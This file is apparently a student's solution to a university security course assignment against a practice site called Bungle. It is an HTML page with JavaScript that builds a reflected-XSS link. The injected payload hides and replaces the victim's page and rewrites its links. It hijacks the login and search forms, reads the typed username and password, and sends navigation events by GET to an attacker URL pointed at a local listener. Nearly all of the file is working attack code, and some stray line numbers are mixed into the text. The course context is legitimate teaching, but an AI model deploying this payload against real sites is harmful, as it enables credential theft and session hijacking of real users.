<!-- Page that builds and shows the reflected-XSS link for the Bungle target
     (see makeLink below).  jQuery 2.0.3 is fetched over plain http with no
     integrity attribute, so anyone on the network path can swap it; that only
     touches this attacker-side page, but use https + SRI if it is ever served
     to anyone else. -->
<meta charset="utf-8">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
  3. <script>
/*
 * payload(attacker): the code that runs inside the victim's Bungle page once the
 * reflected-XSS link from makeLink() is opened.
 *
 * NOTE: makeLink() serializes this function with payload.toString(), so its whole
 * source text -- comments included -- travels in the attack URL and is reflected
 * by the server.  Keep inline comments short and never put a closing script tag
 * (or an HTML comment opener) inside this function.
 *
 * Visible behavior:
 *   log(data)    - GETs data to the attacker URL: the exfiltration channel.
 *   proxy(href)  - pushState()s href so the address bar shows the real path,
 *                  loads href into the page, rewrites every anchor to call
 *                  proxy() instead of navigating, re-binds the login and search
 *                  buttons so submissions go through $.ajax and the response is
 *                  proxied again, and reports the navigation through log().
 *   on ready     - re-injects the attacker URL plus the source of proxy() and
 *                  log() as a page-level script so the onClick attributes it
 *                  wrote can resolve proxy() after payload() has returned.
 *
 * Gaps marked by the TODOs: captured credentials go only to console.log (not to
 * the attacker), the logout button is untouched, and the history/URL handling is
 * only partly done.  It relies on $ (jQuery) already existing in the target page;
 * nothing here loads it.  Credential/search capture depends on the target having
 * #log-in-btn, #username, #userpass, #search-btn and #query elements.
 */
function payload(attacker) {

  // Exfiltration: echo locally, then send as a GET query to the attacker URL.
  function log(data) {
    console.log($.param(data));
    $.get(attacker, data);
  }

  // Fetch href, render it in place of the current page, and take over its
  // links and forms so the victim stays inside the injected page.
  function proxy(href) {
    //TODO: modify displayed url

    //TODO: push a modified page (that loads the script)
    var stateObj = {
      foo: href
    };
    // Address bar now shows href without a real navigation.
    history.pushState(stateObj, "page 2", href);

    $("html").load(href, function() {
      $("html").show();

      // replace all links with proxy
      $('a').each(function() {
        console.log("replaced sth :D");
        var value = $(this).attr('href');
        // NOTE: value is pasted into JS source unescaped; a double quote in it
        // would break the handler.  proxy must be a page global by click time.
        $(this).attr('onClick', /*proxy.toString() + ';*/'proxy(\"' + value + '\")');
        $(this).attr('href', '#');

      });

      //hijack login form
      if ($('#log-in-btn').length) {
        $('#log-in-btn').on("click", function(e) {
          e.preventDefault();
          var un = $('#username').val();
          var pw = $('#userpass').val();

          //TODO: log to attacker
          console.log("btn clicked: " + un + ", " + pw);

          // Submit the real login so the victim sees a normal result, then
          // proxy the home page again.
          $.ajax({
            url: "./login",
            data: {
              username: un,
              password: pw,
            },
            type: "POST",
            success: function (data) {
              $("html").html(data);
              proxy("/");
            }
          })
        })
      }

      // hijack search form
      if ($('#search-btn').length) {
        $('#search-btn').on("click", function(e) {
          e.preventDefault();
          var attr = $("#query").val();
          $.ajax({
            url: "./search",
            data: {
              q: attr
            },
            type: "GET",
            success: function (data) {
              $("html").html(data);
              // NOTE: attr is not URL-encoded here, unlike the $.ajax data above.
              proxy("search?q=" + attr);
            }
          })
        })
      }

      //TODO: modify logout button

      // Report every proxied navigation.
      log({
        event: "nav",
        uri: href
      });
    });
  }
  // Hidden until proxy("/") has replaced the (reflected) page content.
  $("html").hide();

  // load our script on the page
  $(document).ready(function() {
    var script = document.createElement('script');
    // attacker is pasted into source as a single-quoted literal: no escaping.
    script.text = "var attacker = '" + attacker + "';\n" + proxy.toString() + "\n" + log.toString();
    document.body.appendChild(script);
    console.log("ready");
  });

  proxy("/");
}
  96.  
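/**
 * Build the reflected-XSS link for the Bungle search page.
 *
 * The returned URL points at target's /search endpoint with the full source of
 * payload() wrapped in a script element inside the q parameter, followed by a
 * call payload("...attacker...").  Opening it runs payload() in the origin of
 * target with attacker as the exfiltration URL.
 *
 * @param {number} xssdefense - server-side defense level; only level 0 (no
 *   filtering) is implemented.
 * @param {string} target - origin of the vulnerable site, with or without a
 *   trailing slash (a trailing slash used to produce "host//search").
 * @param {string} attacker - URL the payload reports to.  Embedded with
 *   JSON.stringify so quotes or backslashes in it cannot break out of the
 *   payload("...") call; a literal closing script tag in it would still break
 *   the reflected page.
 * @returns {string} the complete URL to hand to the victim.
 * @throws {Error} for any xssdefense other than 0, instead of silently
 *   returning undefined (which the caller rendered as href="undefined").
 */
function makeLink(xssdefense, target, attacker) {
  if (xssdefense != 0) { // Implement code to defeat XSS defenses here.
    throw new Error("makeLink: XSS defense level " + xssdefense + " not implemented");
  }
  // The tags are split / escaped so this file's own HTML parser never sees a
  // closing script tag inside the string literal.
  var script = "<script" + ">" + payload.toString() +
    ";payload(" + JSON.stringify(attacker) + ");" + "<\/script" + ">";
  // Strip trailing slashes so "host/" + "/search" does not become "host//search".
  var base = target.replace(/\/+$/, "");
  return base + "/search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent(script);
}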
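// Attack configuration: no server-side filtering, the course's target host,
// and the local listener the payload reports stolen data to.
var xssdefense = 0;
var target = "http://cos432-assn3.cs.princeton.edu/";
var attacker = "http://127.0.0.1:31337/stolen";

// Once the DOM is ready, replace the placeholder text in the h3 with the attack
// link.  The anchor is built through DOM attributes rather than string-pasted
// HTML so the URL (which carries & and %-escapes) is never re-parsed as markup;
// target="run" is kept so repeated clicks reuse the same window.
$(function() {
  var url = makeLink(xssdefense, target, attacker);
  var link = $("<a>").attr("target", "run").attr("href", url).text("Try Bungle!");
  $("h3").empty().append(link);
});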
  110. </script>
  111. <h3>parse error</h3>